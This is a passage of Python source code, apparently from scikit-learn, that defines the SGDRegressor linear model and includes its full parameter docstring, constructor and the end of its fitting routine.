_plain_sgd(coef,
intercept[0],
average_coef,
average_intercept[0],
loss_function,
penalty_type,
alpha, C,
self.l1_ratio,
dataset,
validation_mask, self.early_stopping,
validation_score_cb,
int(self.n_iter_no_change),
max_iter, tol,
int(self.fit_intercept),
int(self.verbose),
int(self.shuffle),
seed,
1.0, 1.0,
learning_rate_type,
self.eta0, self.power_t, self.t_,
intercept_decay, self.average)
self.t_ += self.n_iter_ * X.shape[0]
if self.average > 0:
self._average_intercept = np.atleast_1d(average_intercept)
self._standard_intercept = np.atleast_1d(intercept)
if self.average <= self.t_ - 1.0:
# made enough updates for averaging to be taken into account
self.coef_ = average_coef
self.intercept_ = np.atleast_1d(average_intercept)
else:
self.coef_ = coef
self.intercept_ = np.atleast_1d(intercept)
else:
self.intercept_ = np.atleast_1d(intercept)
class SGDRegressor(BaseSGDRegressor):
"""Linear model fitted by minimizing a regularized empirical loss with SGD
SGD stands for Stochastic Gradient Descent: the gradient of the loss is
estimated each sample at a time and the model is updated along the way with
a decreasing strength schedule (aka learning rate).
The regularizer is a penalty added to the loss function that shrinks model
parameters towards the zero vector using either the squared euclidean norm
L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
parameter update crosses the 0.0 value because of the regularizer, the
update is truncated to 0.0 to allow for learning sparse models and achieve
online feature selection.
This implementation works with data represented as dense numpy arrays of
floating point values for the features.
Read more in the :ref:`User Guide <sgd>`.
Parameters
----------
loss : str, default='squared_loss'
The loss function to be used. The possible values are 'squared_loss',
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'
The 'squared_loss' refers to the ordinary least squares fit.
'huber' modifies 'squared_loss' to focus less on getting outliers
correct by switching from squared to linear loss past a distance of
epsilon. 'epsilon_insensitive' ignores errors less than epsilon and is
linear past that; this is the loss function used in SVR.
'squared_epsilon_insensitive' is the same but becomes squared loss past
a tolerance of epsilon.
More details about the losses formulas can be found in the
:ref:`User Guide <sgd_mathematical_formulation>`.
penalty : {'l2', 'l1', 'elasticnet'}, default='l2'
The penalty (aka regularization term) to be used. Defaults to 'l2'
which is the standard regularizer for linear SVM models. 'l1' and
'elasticnet' might bring sparsity to the model (feature selection)
not achievable with 'l2'.
alpha : float, default=0.0001
Constant that multiplies the regularization term. The higher the
value, the stronger the regularization.
Also used to compute the learning rate when set to `learning_rate` is
set to 'optimal'.
l1_ratio : float, default=0.15
The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
Only used if `penalty` is 'elasticnet'.
fit_intercept : bool, default=True
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered.
max_iter : int, default=1000
The maximum number of passes over the training data (aka epochs).
It only impacts the behavior in the ``fit`` method, and not the
:meth:`partial_fit` method.
.. versionadded:: 0.19
tol : float, default=1e-3
The stopping criterion. If it is not None, training will stop
when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive
epochs.
.. versionadded:: 0.19
shuffle : bool, default=True
Whether or not the training data should be shuffled after each epoch.
verbose : int, default=0
The verbosity level.
epsilon : float, default=0.1
Epsilon in the epsilon-insensitive loss functions; only if `loss` is
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
For 'huber', determines the threshold at which it becomes less
important to get the prediction exactly right.
For epsilon-insensitive, any differences between the current prediction
and the correct label are ignored if they are less than this threshold.
random_state : int, RandomState instance, default=None
Used for shuffling the data, when ``shuffle`` is set to ``True``.
Pass an int for reproducible output across multiple function calls.
See :term:`Glossary <random_state>`.
learning_rate : string, default='invscaling'
The learning rate schedule:
- 'constant': `eta = eta0`
- 'optimal': `eta = 1.0 / (alpha * (t + t0))`
where t0 is chosen by a heuristic proposed by Leon Bottou.
- 'invscaling': `eta = eta0 / pow(t, power_t)`
- 'adaptive': eta = eta0, as long as the training keeps decreasing.
Each time n_iter_no_change consecutive epochs fail to decrease the
training loss by tol or fail to increase validation score by tol if
early_stopping is True, the current learning rate is divided by 5.
.. versionadded:: 0.20
Added 'adaptive' option
eta0 : double, default=0.01
The initial learning rate for the 'constant', 'invscaling' or
'adaptive' schedules. The default value is 0.01.
power_t : double, default=0.25
The exponent for inverse scaling learning rate.
early_stopping : bool, default=False
Whether to use early stopping to terminate training when validation
score is not improving. If set to True, it will automatically set aside
a fraction of training data as validation and terminate
training when validation score returned by the `score` method is not
improving by at least `tol` for `n_iter_no_change` consecutive
epochs.
.. versionadded:: 0.20
Added 'early_stopping' option
validation_fraction : float, default=0.1
The proportion of training data to set aside as validation set for
early stopping. Must be between 0 and 1.
Only used if `early_stopping` is True.
.. versionadded:: 0.20
Added 'validation_fraction' option
n_iter_no_change : int, default=5
Number of iterations with no improvement to wait before early stopping.
.. versionadded:: 0.20
Added 'n_iter_no_change' option
warm_start : bool, default=False
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
See :term:`the Glossary <warm_start>`.
Repeatedly calling fit or partial_fit when warm_start is True can
result in a different solution than when calling fit a single time
because of the way the data is shuffled.
If a dynamic learning rate is used, the learning rate is adapted
depending on the number of samples already seen. Calling ``fit`` resets
this counter, while ``partial_fit`` will result in increasing the
existing counter.
average : bool or int, default=False
When set to True, computes the averaged SGD weights accross all
updates and stores the result in the ``coef_`` attribute. If set to
an int greater than 1, averaging will begin once the total number of
samples seen reaches `average`. So ``average=10`` will begin
averaging after seeing 10 samples.
Attributes
----------
coef_ : ndarray of shape (n_features,)
Weights assigned to the features.
intercept_ : ndarray of shape (1,)
The intercept term.
average_coef_ : ndarray of shape (n_features,)
Averaged weights assigned to the features. Only available
if ``average=True``.
.. deprecated:: 0.23
Attribute ``average_coef_`` was deprecated
in version 0.23 and will be removed in 0.25.
average_intercept_ : ndarray of shape (1,)
The averaged intercept term. Only available if ``average=True``.
.. deprecated:: 0.23
Attribute ``average_intercept_`` was deprecated
in version 0.23 and will be removed in 0.25.
n_iter_ : int
The actual number of iterations before reaching the stopping criterion.
t_ : int
Number of weight updates performed during training.
Same as ``(n_iter_ * n_samples)``.
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import SGDRegressor
>>> from sklearn.pipeline import make_pipeline
>>> from sklearn.preprocessing import StandardScaler
>>> n_samples, n_features = 10, 5
>>> rng = np.random.RandomState(0)
>>> y = rng.randn(n_samples)
>>> X = rng.randn(n_samples, n_features)
>>> # Always scale the input. The most convenient way is to use a pipeline.
>>> reg = make_pipeline(StandardScaler(),
... SGDRegressor(max_iter=1000, tol=1e-3))
>>> reg.fit(X, y)
Pipeline(steps=[('standardscaler', StandardScaler()),
('sgdregressor', SGDRegressor())])
See Also
--------
Ridge, ElasticNet, Lasso, sklearn.svm.SVR
"""
@_deprecate_positional_args
def __init__(self, loss="squared_loss", *, penalty="l2", alpha=0.0001,
l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
random_state=None, learning_rate="invscaling", eta0=0.01,
power_t=0.25, early_stopping=False, validation_fraction=0.1,
n_iter_no_change=5, warm_start=False, average=False):
super().__init__(
loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
shuffle=shuffle, verbose=verbose, epsilon=epsilon,
random_state=random_state, learning_rate=learning_rate, eta0=eta0,
power_t=power_t, early_stopping=early_stopping,
validation_fraction=validation_fraction,
n_iter_no_change=n_iter_no_change, warm_start=warm_start,
average=average)
def _more_tags(self):
return {
'_xfail_checks': {
'check_sample_weights_invariance':
'zero sample_weight is not equivalent to removing samples',
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.